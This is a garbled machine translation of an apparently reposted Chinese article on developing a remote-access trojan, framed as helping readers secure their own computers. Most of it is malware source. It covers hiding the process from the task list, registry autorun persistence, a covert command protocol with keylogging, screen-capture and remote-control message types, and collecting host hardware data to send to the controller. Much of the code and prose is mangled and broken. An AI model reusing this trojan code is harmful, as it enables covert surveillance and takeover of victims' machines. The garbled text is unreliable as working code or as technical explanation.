Perspective Trojm Horse program development technology (transfer)
Turn: Pure CZ88.NET
In recent years, hacker technology has been ripe, and there is a great threat to cyber security. One of the main attack methods of hackers is to use Trojan technology, penetrate into the other's host system, thereby implementing the remote operation target host. Its destructive power is inspiring. How is hacker how to make this kind of destructive Trojan, let's take a detailed analysis of the source code level of Trojans, let us make a development technology of Trojans Thorough perspective, from understanding the wood horse technology, more securely manages its own computer.
1, classification of Trojan
Since the development of Trojans Technology, it has experienced 4 generations, the first generation, that is, simple password stealing, sending, etc., there is nothing special. The second generation of Trojans have a great progress in technology, and the ice river can say one of the typical representatives of domestic Trojans. The third generation of Trojans has made a small improvement in data delivery, and there is an ICMP and other types of Trojans, and the data is transmitted by the malformation packet, and the difficulty of killing is increased. The fourth-generation Trojan has made a large change in the process of hiding, using the kernel plug-in embedded mode, using remote insertion thread technology, embedding the DLL thread. Or hook PSAPI, implement hidden horses, even under Windows NT / 2000, has reached a good hidden effect. I believe that the fifth generation Trojan will soon be prepared. Without a more detailed description, you can refer to SHOTGUN's article "Uncover the mystery of Trojans".
2. Trojan's hidden technology
Trojan's server side, in order to avoid being discovered, most of them have to hide the handling, let us take a look at how Trojans have hidden.
Speaking of hidden, first understand three related concepts: processes, threads and services. I will explain it.
Process: A normal Windows application, after running, you will generate a process in the system, while each process, respectively corresponds to a different PID (Progress ID, Process Identifier), will be allocated by the system Virtual memory space address segments, everything related program operations will be made in this virtual space.
Thread: A process, there can be one or more threads, and multiple operations between threads, generally, threads are independent of each other, when a thread is wrong, does not necessarily lead to crash of the entire process .
Services: A process When working in a service, it will work in the background without appearing in the list of task, but under Windows NT / 2000, you can still check any service programs through the service manager. Start running.
If you want to hide the server side of the Trojan, you can pseudo hide or hide. Pseudo-hidden, means that the process of the program still exists, just let him disappear in the list of processes. True hidden is to make the program completely disappear, do not work in a process or service.
The pseudo-hidden method is more easy to implement, as long as the Trojan server-side program is registered as a service, this, the program will disappear from the task list, because the system does not think he is a process, when Press CTRL ALT DELETE, you can't see this program. However, this method only applies to Windows9x systems, for Windows NT, Windows 2000, etc., you will find the service you registered in the system. Is the pseudo-hidden approach really can't be used under Windows NT / 2000? Of course, there is also a way, that is, the intercept technology of the API, through the establishment of a background system hook, intercepts the function of PSAPI's EnumProcessModules et al. To implement traversal calls for the process and services, when detected process ID (PID) is Trojan The server's server-side process is jumped directly, so that the process is hidden, Jinshan Words and other software are used to use similar methods to intercept the TextOuta, TextOutw function, intercept screen output, to realize instant translation. Similarly, this method can also be hidden in the process. When the process is really hidden, then after the server of this Trojan is running, it should not have a general process, nor should it be available, that is, completely soluble the system's kernel. Maybe you will feel weird, just after the application is running, will you have a process? Indeed, so we can do not make him an app, and do him as a thread, a thread of another application, and inject itself into the address space of other applications. This application is an absolutely safe program for the system, so that the effect of thorough hidden is achieved, which has led to the increase in difficulty in killing black passenger programs.
For safety reasons, I only give a method of implementing process pseudo-hidden methods, for more complex, advanced hidden methods, such as methods of moving other processes, such as remote threads, under the NT system under SHOTGUN Hide and Detection of Trojan Process ".
WinApi Winmain (Hinstance, Hinstance, LPSTR, INT)
{
Try
{
DWORD dWVersion = getVersion (); // get the version number of Windows
IF (dWVersion> = 0x80000000) // Windows 9x hidden task list
{
INT (Callback * RSP) (DWORD, DWORD);
Hinstance DLL = LoadLibrary ("kernel32.dll"); // Load Kernel32.dll
RSP = (int (Callback *) (DWORD, DWORD)) GetProcaddress (DLL, "RegisterServiceProcess"); / / Find the entrance to RegisterServiceProcess
RSP (NULL, 1); // Register Service
Freelibrary (DLL); // Release DLL module
}
}
Catch (Exception & Exception) // Handling Exception Event
{
// Treat an exception event
}
Return 0;
3. Self-loading operation technology of the program
Make the program self-running method, in addition to the most common method: load the program to the startup group, write program start path to the registry HKEY_LOCAL_MACHINE / Software / Microsoft / Windows / CurrentVersions / Run method, there are many other ways. According to YAGAMI, there are dozens of methods, such as modifying Boot.ini, or directly hooks through the input method values in the registry, by modifying the method of using the Explorer.exe startup parameters, really It can be said to be anti-fighting, the following shows a self-started program by modifying hkey_local_machine / software / runies: self-loading part:
HKEY HKEY;
Ansistring NewPrograme = Ansistring (Sys) Ansistring (" PNAME /"> // ") PNAME
Unsigned long k;
K = reg_opened_existing_key;
RegcreateKeyex (HKEY_LOCAL_MACHINE,
"Software // Microsoft // Windows // CurrentVersion // Run //",
0L,
NULL,
REG_OPTION_NON_VOLATILE, Key_All_Access | key_set_value,
NULL,
& HKEY, & K);
RegSetValueex (HKEY,
"Backgroup",
0,
REG_SZ,
NewProgramname.c_str (),
NewProgramname.length ());
RegcloseKey (HKEY);
IF (int (shellexecute (Handle,
"open",
NewProgramname.c_str (),
NULL,
NULL,
SW_HIDE))> 32)
{
Wantclose = True;
CLOSE ();
}
Else
{
HKEY HKEY;
Unsigned long k;
K = reg_opened_existing_key;
Long a = regcreateKeyex (HKEY_LOCAL_MACHINE,
"Software // Microsoft // Windows // CurrentVersion //r",
0,
NULL,
REG_OPTION_NON_VOLATILE,
Key_Set_Value, NULL,
& HKEY, & K);
RegSetValueex (HKEY,
"Backgroup",
0,
REG_SZ,
Programname.c_str (),
ProgramName.length ());
INT NUM = 0;
Char Str [20];
DWORD LTH = 20;
DWORD TYPE;
Char STRV [255];
DWORD VL = 254;
DWORD SUC;
Do {
SUC = RegenumValue (HKEY_LOCAL_MACHINE,
(DWORD) NUM, STR,
NULL,
& Type,
STRV, & VL);
IF (strcmp (str, "bgroup") == 0)
{
DELETEFILE (ANSISSTRING (STRV));
Regdeletevalue (HKEY_LOCAL_MACHINE, "BGROUP");
Break;
}
} while (SUC == Error_Success);
RegcloseKey (HKEY);
}
Uninstall code from the loading program:
Int Num;
CHAR STR2 [20];
DWORD LTH = 20;
DWORD TYPE;
Char STRV [255];
DWORD VL = 254;
DWORD SUC;
Do {
SUC = RegenumValue (HKEY_LOCAL_MACHINE,
(DWORD) NUM,
Str,
NULL,
& Type,
STRV,
& vl);
IF (strcmp (str, "bgroup") == 0)
{
DELETEFILE (ANSISSTRING (STRV));
Regdeletevalue (HKEY_LOCAL_MACHINE, "BGROUP");
Break;
}
While (SUC == Error_Success)
HKEY HKEY;
Unsigned long k;
K = reg_opened_existing_key;
RegcreateKeyex (HKEY_LOCAL_MACHINE,
"Software // Microsoft // Windows // CurrentVersion //r",
0,
NULL,
REG_OPTION_NON_VOLATILE,
Key_Set_Value, NULL,
& HKey,
& k);
Do {
Suc = regenumvalue (HKEY, (DWORD) NUM, STR, IF (Str, "BackGroup" == 0)
{
DELETEFILE (ANSISSTRING (STRV));
Regdeletevalue (HKEY_LOCAL_MACHINE, "backgroup");
Break;
}
While (SUC == Error_Success)
RegcloseKey (HKEY);
The self-loading portion can be written with C Builder, which will be simplified:
Tregistry & regkey = * new tregistry ();
Regkey.rootkey = HKEY_LOCAL_MACHINE
RegKey.openkey ("Software // Microsoft // Windows // CurrentVersion // Run", true);
IF (! Regkey.Valueexists ("Interbase Server"))
{
Regkey.writestring ("Interbase Server",
"D: // program files // borland // INTRBASE / / BIN // IBServer.exe");
}
RegKey.closeKey ();
DELETE & Regey;
4, there are many types of data transfer methods for the establishment of Trojans, there are many types of data transfer methods of Trojans, the most common way to transmit data, usually, usually using Winsock with the target machine's specified port, using Send And the API of the RECV performs data, but because the concealment of this method is poor, it is often easy to check, the easiest, such as using the netstat command in the command line state, so you can check the current activity. TCP, UDP connection.
C: / Documents and Settings / bigball> netstat -n Active Connections Proto Local Address Foreign Address State TCP 192.0.0.9:1032 64.4.13.48:1863 ESTABLISHED TCP 192.0.0.9:1112 61.141.212.95:80 ESTABLISHED TCP 192.0.0.9:1135 202.130.239.223:80 ESTABLISHED TCP 192.0.0.9:1142 202.130.239.223:80 ESTABLISHED TCP 192.0.0.9:1162 192.0.0.8:139 TIME_WAIT TCP 192.0.0.9:1169 202.130.239.159:80 ESTABLISHED TCP 192.0.0.9:1170 202.130. 239.133: 80 Time_Wait C: / Documents and Settings / Bigball>
netstat -a Active Connections Proto Local Address Foreign Address State TCP Liumy: echo Liumy: 0 LISTENING TCP Liumy: discard Liumy: 0 LISTENING TCP Liumy: daytime Liumy: 0 LISTENING TCP Liumy: qotd Liumy: 0 LISTENING TCP Liumy: chargen Liumy: 0 LISTENING TCP Liumy: epmap Liumy: 0 LISTENING TCP Liumy: microsoft-ds Liumy: 0 LISTENING TCP Liumy: 1025 Liumy: 0 LISTENING TCP Liumy: 1026 Liumy: 0 LISTENING TCP Liumy: 1031 Liumy: 0 LISTENING TCP Liumy: 1032 Liumy: 0 LISTENING TCP Liumy: 1112 Liumy: 0 LISTENING TCP Liumy: 1135 Liumy: 0 LISTENING TCP Liumy: 1142 Liumy: 0 LISTENING TCP Liumy: 1801 Liumy: 0 LISTENING TCP Liumy: 3372 Liumy: 0 LISTENING TCP Liumy: 3389 Liumy: 0 LISTENING TCP LiuMy: Netbios-SSN LiUMy: 0 listening TCP LiUMy: 1028 liumy: 0 listening TCP Liumy: 1032 msgr-ns19.msgr.hotmail.com:1863 ESTAB TCP LiUMy: 1112 szptt61.141.szptt.net.cn: http Establi TCP LiUMy: 1135 202.130.239.223:Http Established TCP Liumy: 1142 202.130.239.223:Http Established TCP Liumy: 1162 W3i: Netb ios-ssn TIME_WAIT TCP Liumy: 1170 202.130.239.133:http TIME_WAIT TCP Liumy: 2103 Liumy: 0 LISTENING TCP Liumy: 2105 Liumy: 0 LISTENING TCP Liumy: 2107 Liumy: 0 LISTENING UDP Liumy: echo *: * UDP Liumy: discard * : * Udp liumy: daytime *: * UDP liumy: totd *: * udp liumy: epmap *: * udp liun: snmp *: * udp liumy: microsoft-ds *: * udp liumy: 1027 *: * UDP LiUMy: 1029 *: * udp liumy: 3527 *: * udp liumy: 400 *: * UDP LiUMy: 1033 *: * UDP LiUMy: 1148 *: * udp liumy: NetBIOS NS *: * UDP LiUMy: Netbios-DGM *: * UDP LiUMy: Isakmp *: * However, hackers still avoid this reconnaissance, there are more than two methods I know, one is a combined port method. That is to say, use special means to bind two TCP or UDP connections on a port, which sounds incredible, but in fact, this is true,
And there have been programs that use similar methods, bind their Trojan ports above the specific service port, (such as HTTP of the 80-port, who doubts that he will be a Trojan program?) Thus reaching the hidden port. Another way is to send data from the ICMP (Internet Control Message Protocol) protocol, the principle is to modify the structure of the ICMP header, join the Trojan control field, such a Trojan, with a lot of new features, not occupying the characteristics of the port, User users can not find out, while using ICMP can penetrate some firewalls, thereby increasing the difficulty of preventing prevention. The reason why this feature is because ICMP is different from TCP, UDP, and ICMP works in the network's application layer does not use TCP protocols. Regarding the structure of the network level, the illustration is given: Network Hierarchy Figure 5, an organizational method of transmitting data about data, can be said to be a mathematical problem. The key is to deliver the reliability, compression, and efficient line of data.
Trojans, in order to avoid being found, you must control the amount of data transfer, a good Trojan, often have your own transfer agreement, then how to organize the implementation? Below, I will give some protocols: typedef struct {// Define message structure // char ip [20]; char Type; // message type char password [20]; // password int CNUM; // message Operation number // INT length; // message length} msg; #define msglen sizeof (msg) // ----------------------------- ------------ // dialog box packet definition: DLG_MSG_Type.H // ------------------------- ------------------ // Define the following message Type: #define msgdlgcommon 4 // Connection Event #define msgdlgsend 5 // Send Complete Event // Message Typedef struct {char Name [20]; // Dialog Title Char MSG [256]; // Dialog Box Message} msgdlguint; #define msgdlglen sizeof (msgdlguint) // Message unit length // ----------- ------------------------------ // Chat packet definition: chat_msg_type.h // ------- --------------------------------- / / Define the following message Type: #define msgchatcommon 0 // Connecting event #define msgchatconnect 1 // Access Event #define msgchatescest 2 // End Event #define MsgCHRECEIVED 16 // Confirmation Content Receive // Message TypeDef Struct {Char ClientName [20]; // Client Custom Name Char MSG [256]; // Send message} msgchatuint; #define msgchatlen sizeof (msgchatuint) // Message cell length // ------------------------ ------------------ // Restart the packet definition: reboot_msg_type.h // ---- -------------------------------------- // Define the following message Type: #define msgreboot 15 / / Restart event / / ---------------------------------------- // directory Structure request packet definition: DIR_MSG_TYPE.H / / --------------------------------------- --- // message type is defined as follows: #define MsgGetDirInfo 17 #define MsgReceiveGetDirInfo 18 typedef struct {char Dir [4096]; // you directory name} MsgDirUint; #define MsgDirUintLen sizeof (MsgDirUint) // TCP of Msg typedef Struct {// Define Message Structure CHAR Stype; // Message Category Char Spassword [20]; // Password // Int SNUM; // Message Operational Number Char * AllMsg;} SMSG;
#define SMsgLen sizeof (SMsg) #define MSGListProgram 19 #define MSGFlyMouse 21 #define MSGGoWithMouse 22 #define MSGSaveKey 23 #define MSGTracekey 24 #define MsgCopyScreen 25 // tcp received message, udp request message #define MSGCopyWindow 26 // ---- --------------------- // Mouse pointer hidden and display control // ----------------- ------ #define MsgSetMouseStat 27 // 28 // setup message success message MsgMouseStat #define typedef struct {bool mouseshow;} MsgSetMouseStatUint; #define MsgSetMouseStatUintLen sizeof (MsgSetMouseStatUint) // ---------- --------------- // Taskbar hide and display control // ----------------------- #define MsgSetTaskBarStat 29 // 30 // setup message success message MsgTaskBarStat #define typedef struct {bool taskshow;} MsgSetTaskBarStatUint; #define MsgSetTaskBarStatUintLen sizeof (MsgSetTaskBarStatUint) // ---------------- --------- // Get machine name // ------------------------- #Define msggetnetbiosname 31 // Request # Define msgnetBiosName 32 // Route TypeDef struct {char NetbiosName [128];} msgnetbiosNameuint; #define msgnetbiosnameuintlen sizeof (msgnetbiosnameuint) // ------------------------- // Close process change! // --------------- ---------- #define msgSetProgramClose 33 // Close Request #define msgprogramclosed 34 // Success message ----- typef struct {char program [4096]; // old struct: char programname [128] / / To close the name of the window} msgSetProgramCloseuint; #define msgsetprogramcloseuintlen sizeof (msgSetProgramCloseuint) // ----------------------- // Open process Change! // ------------------------- #define msgSetProgramopen 20 // Open Request #define msgprogrampened 36 // Success message TypedEf struct {char Programname [4096]; // Old struct: char programname [128]; // The name BOOL ProgramShow; // front run or background running program (hidden run)} msgSetProgramopenuint;
#define MsgSetProgramopenuintlen SizeOf (MsgSetProgramopenuint) #define Msggethardware 35 // Request Hardware Information (UDP Message) and Rehabilitation Hardware Information (TCP Message) The above definition is used to use TCP and UDP's objective purpose to reduce TCP connections. This consumed system resource will be less, it is not easy to let the target aware. Many Trojans have similar password definitions in the above definition, which is to prevent connection requests for non-real clients. Snum is the message operator number, its role is to test whether the data is transmitted, knows that the OICQ we are familiar with is also using this way to check the message.
The data protocol is organized, and there is another step in work, that is, the data packaging transmission, the general method is to press all the data into a VOID type data stream, then send: msg * msg = new msg; tmemorystream * RData = new TMEMORYSTREAM; NMUDP1 -> readStream (RData); RData-> Read (msg, sizeof (Msg)); UdpConnect * udpconnect = new UdpConnect; NetBiosName * netbiosname = new NetBiosName; if (msg-> CNum == CNumBak) return; else {CNumBak = MSG-> cnum; switch (msg-> type) {case 0: // msgudpConnect RData-> read (udpConnect, sizeof (udpconnect)); Checkuser (udpconnect-> isright); Break; Case 1: RData-> Read ( NetbiosName, Sizeof (NetbiosName)); Ansistring JQM = "Machine Name"; JQM = (ANSISTRING) NetBiosName-> NetBiosName; Memo2-> Lines-> Add (jqm); Break;}} When the server receives data, first The job to be done is to unpack restore VOID streams into structured protocols. Here is the example code: nmudp1-> remotehost = fromip; nmudp1-> remoteport = port; tmemorystream * rdata = new TMEMORYSTREAM; nmudp1-> readstream (RDATA ); Msg * msg = new msg; rdata-> read (MSG, SIZEOF (MSG)); if (msg-> cnum == cnumbak) return; else {cnumbak = msg-> cnum; switch (msg-> type) {Case 0: Checkuser (MSG-> Password); Break; Case 1: GetNetBiosName (); Break; Case 2: Checkhard (); Break;}} In addition, many Trojans support the screen back to the function, the fundamental principle is to capture the screen picture, then return to the client, because the data amount is large, so, Many Trojans are simply retransciting some pictures of the change in the screen. The common means is the minimum rectangular method. The following is an algorithm for friends "Ancient Legends". Number #define maxycount 5 // ... y ................ #define destnum 1000 // Each block offset detection point maximum number colorref colors [Maxxcount] [MAXYCOUNT ] [DestNum]; COLORREF BakColors [MAXXCount] {MAXYCount] [DestNum]; TPoint Dests [DestNum]; int Sw; int Sh; int xCount; int yCount; int ItemWidth; int ItemHeight; int Dnum; int Qlity; // get After the message is executed:
//: DNUM, QLITY / / DNUM: Offset Object Number // qlity: Image Requirements Quality__fastcall tform1 :: Copyscreen (int Dnum, int qlity) {itemwidth = SW / Xcount; itemHeight = sh / ycount; sw = screen-> width; sh = screen-> height; xcount = (SW> 1000)? 8: 6; ycount = (sh> 1000)? 3: 2; for (int Num1 = 0; Num1 dests [Num1] .x = random (itemwidth); dests [Num1] .y = random (itemHeight);} CatchScreen (DNUM, QLITY);} // only execute after receiving the brush screen message: Catchscreen DNUM, QLITY); __FASTCALL TFORM1 :: CATCHSCREEN (INT DNUM, INT QLITY) {// Function function: Scan change screen area, and cut the optimization process, and finally send these area data // DNUM: Offset QLITY: Figure Icon Quality HDC DC = Getdc (getDesktopWindow ()); graphics :: Tbitmap * bm = new graphics :: tbitmap; bm-> width = sw; bm-> height = sh; bitblt (bm-> canvas-> handle, 0 , 0, SW-1, SH-1, DC, 0, 0); Int Num1, Num2, Num3; INT NOWX, NOWY; BOOL CHANGE; Bool ItemChange [MAXCOUNT] [MAXYCOUNT]; for (Num1 = 0; Num1 NOWX = ItemWidth * Num1; for (Num2 = 0; Num2 nowy = itemHeight * Num2; Change = false; for (Num3 = 0; Num3 colors [Num1] [Num2] [Num3] = BM-> Canvas-> Pixels [nowx DESTS [Num3] .x] [NOWY DESTS [Num3] .y]; if (colors [Num1] [Num2] [Num3] ! = BakColors [Num1] [Num2] [Num3]) {Bakcolors [Num1] [Num2] [Num3] = Colors [Num1] [Num2] [Num3]; itemchange [Num1] [Num2] = true;}}}} int CNum, MaxCNum; int ChangedNum = 0; TRect * Rect; int num4; int MinSize = 10000; int m; TRect MinRect; Graphics :: TBitmap * bt2 = new Graphics :: TBitmap; TJPEGImage * j = new TJPEGImage; // ************************ J-> Quality = QLITY; // ************************** ******* COPYSCREENUINT COPYSCREEN; COPYSCREENITEMUINT COPYSCREENITEM; TMEMORYSTREAM * MS = New TMEMORYSTREAM; MS-> Write (& TCPMSG, SIZEOF (TCPMSGUINT));
MS-> Write (& COPYSCREEN, SIZEOF (COPYSCREENUINT)); do {for (Num1 = 0; Num1 for (Num2 = 0; Num2 for (Num3 = Num1 1; Num3 <= xcount; Num3 ) {Maxcnum = 0; for (Num4 = Num2 1; Num4 <= ycount; Num4 ) {// Traverse all rectangular cnum = getChangeDNum (TRECT (NUM1, NUM2, NUM3, NUM4); if (cnum> maxcnum) Maxcnum = cnum; m = (Num3 -Num1) * (NUM4-NUM2); if (2 * m-cnum minsize = 2 * m-cnum; minRect = TRECT (Num1, Num2, Num3, Num4);}}} TMEMORYSTREAM * MS; Bitblt (bt2-> Canvas-> Handle, 0, 0, ItemWidth-1, ItemHeight-1, Bt-> Canvas-> Handle, 0, 0); J-> Assign (BT2); J-> SaveTream (MS2); CopyscreenItem.Rect = TRect (num1, num2, num3, num4); CopyScreenItem.FileType = JPEGFILE; // JPEGFILE defined as: #define JPEGFILE 1 ms2-> Position = 0; CopyScreenItem.Length = ms2-> Size; ms-> Write (& CopyScreenItem, SIZEOF (ScreenItemUint)); MS-> CopyFrom (MS2, MS2-> Size); ChangedNum ;} while (maxcnum> 0); tcpmsg.type = msgcopyScreen; ms-> position = 0; tcpmsg.length = ms-> size -sizeof (tcpmsguint); Copyspace; MS-> Write (& TCPMSG, SIZEOF (TCPMSGUINT)); MS-> Write (& CopyScreen, Sizeof (Copyscr) Eenuint); ms-> position = 0; SOCK-> SendStream (ms);} This program scores the screen screen into multiple parts, and stores the screen as JPG format, so that the compression ratio is very high. By compressing the processed data through this method, it becomes very small, even in the case where the screen does not change, the amount of data transmitted is 0, and there is not much analysis here, interested friends, you can take a look. 6. The acquisition of the target machine is relatively simple to the above part. The method implemented here is much simpler. This segment will be relaxed, and the method of acquiring the machine is to call the relevant API. This is very good at the application. similar.
ANSISTRING CS; FILE * FP; FP = FOPEN ("Temp.had", "W "); // Todo: Add Your Source Code Here // Get CPU Model System_INFO SystemInfo; GetSystemInfo (& SystemInfo); cs = "CPU type is : " String (SystemInfo.dwprocessortype) " / n "; fwrite (cs.c_str (), cs.length (), 1, fp); MemoryStatus memory; memory.dwlength = sizeof (Memory); // Initialize GlobalMemoryStatus (& meMory); CS = "Physical memory is (MB):" String (int (Memory.dwtotalphys / 1024/1024)) "/ n"; fwrite (cs.c_str (), cs.length (), 1 , fp); cs = "Available memory is (KB):" String (int (Memory.dwavailphys / 1024) "/ n"; fwrite (cs.c_str (), cs.length (), 1, fp ); DWord Sector, Byte, Cluster, Free; Long Int Free, Totalspace; Uint Type; Char Name; // 0- Unknown Disk, 1- does not exist, 2-removable disk, 3-fixed disk, 4-network disk , // 5-CD-ROM, 6-Memory Virtual Disk Char Volname [255], FileName [100]; // Buffer [512]; DWORD SNO, MaxL, Fileflag; for (Name = 'A'; Name <= 'Z'; Name ) {// cycle detection A ~ z type = getDriveType (Ansistring (Name) ':'). C_str ()); // Get disk type if (Type == 0) {cs = "Unknown Type Disk:" String (Name) "/ N"; fwrite (cs.c_str (), cs.length (), 1, fp);} else f (type == 2) {cs = " Move type magnetic Disk: " String (Name) " / N "; fwrite (cs.c_str (), cs.length (), 1, fp);} else if (type == 3) {cs =" fixed disk: " String (Name) "/ N"; fwrite (cs.c_str (), cs.lend (), 1, fp);} else if (type == 4) {cs = "network mapping disk:" string (Name) "/ n"; fwrite (cs.c_str (), cs.length (), 1, fp);} else if (type == 5) {cs = "CD-ROM:" String (Name) "/ n"; fwrite (cs.c_str (), cs.lend (), 1, fp);} else if (type == 6) {cs = "memory virtual disk:"
String (name) "/ n"; fwrite (cs.c_str (), cs.lend (), 1, fp);} if (string (name)). C_str (':')). C_str ), Volname, 255, & Sn, & MaxL, & FileFlag, FileName, 100)) {cs = string (name) " String (Volname) " / n "; fwrite (cs.c_str () , cs.lend (), 1, fp); cs = string (name) "disk serial number is:" String (SNO) "/ n"; fwrite (cs.c_str (), cs.length (), 1, fp); getDiskFreespace ((Name) String (':')). C_str (), §OR, & BYTE, & Free, & Cluster); // Get Back Parameters Totalspace = int (cluster) * Byte * Sector / 1024/1024; // Calculation total capacity freepace = int (free) * byte * Sector / 1024/1024; // Calculate free space CS = String (name) string (':') "total space (MB) : " Ansistring (Totalspace) " / N "; fwrite (cs.c_str (), cs.lend (), 1, fp); cs = string (name) string (':') " disk available Space (MB): " Ansistring (FreeSpace) " / n "; fwrite (cs.c_str (), cs.length (), 1, fp);}} int Wavedevice, MIDIDEVICE; Waveoutcaps Wavecap; MidioutCaps Midicap; WaveDevice = (int) WaveoutGetNumdevs (); // Waveform device information MIDIDEVICE = (int) midiOutGetNumdevs (); // MIDI device information if (WaveDevice! = 0) {WaveoutGetDevcaps (0, & Wavecap, Sizeof (WaveoutCaps)); CS = "Current Warter Device:" String (Wavecap.szpname) "/ N"; fwrite (cs.c_str (), cs.length (), 1, fp);} if (Mididevice! = 0) {MidiOutgetDevcaps (0, & Midicap, SizeOf (MidioutCaps)); CS = "Current MIDI Device:" String (Midicap.Szpname) "/ N"; fwrite (cs.c_str (), cs.length (), 1, fp) Long Double TCS; Long Double Tc; Long Int BPP, CP; CS = "Current resolution is:" string (screen-> width) Ansistring ("*") string (screen-> height) " / N "; fwrite (cs.c_str (), cs.length (), 1, fp); bpp =
GetDeviceCaps (canvas-> handle, bitspixel); TCS = POW (2, bpp); // Calculate color gradient number cp = getDeviceCaps (Form1-> canvas-> handle, planes); TC = Pow (Double (TCS), Double (CP)); // Calculate the color depth ANSISTRING SSS; SSS = BPP; CS = "The current color depth is:" SSS "/ n"; fwrite (cs.c_str (), cs.length (), 1, FP); fclose (fp); Ansistring filename = "temp.had"; char * buf; tcpmsguint msg2; strcpy (msg2.tpassword, password); tMemoryStream * ms = new tmemorystream; ms-> clear (); if (! FileExists (filename)) Checkhard (); tfilestream * fs = new TFileStream (filename, fmopenread); buf = new char [fs-> size sizeof (tcpmsguint) 1]; fs-> read (buf, fs-> size ); Msg2.type = msggethardware; msg2.Length = fs-> size; fileclose (fs-> handle); ms-> write (& msg2, sizeof (tcpmsguint)); ms-> write (buf, msg2.length); MS-> POSITION = 0; delete [] buf; try {sock-> sendstream (ms);} catch (Exception & E) {}} The above program is basically taken. 7, the server-side package packaging and encryption Some software allows the user to customize the port number. The purpose of this is to prevent it from being detected by the anti-black program. How is this function? Let us first let us do an experiment: do the following to enter the Windows command line mode 1) C: /> Copy Server.exe Server.bak 2) Create a text file Test.txt, its content is "http: // www .patching.net "3) C: /> Type text.txt >> Server.exe 4) How about running server.exe? Is it found that server.exe still can still run? The mysteries of the Trojan server are here: First, it has become an exe file. There is an operation of reading the contents of the process. When reading, the file pointer directly points to the end of the process, the countdown N of the end User-customized information is obtained at the byte, such as port numbers, etc., and then passed to the relevant part of the program for processing. Not given the relevant code part, interested friends, please refer to some file package code, the technique used is small. 8. Summarize some of the techniques described above, basically include all the second-generation Trojan characteristics, individual Trojan supports server list, macro propagation, etc., realizing the same size.
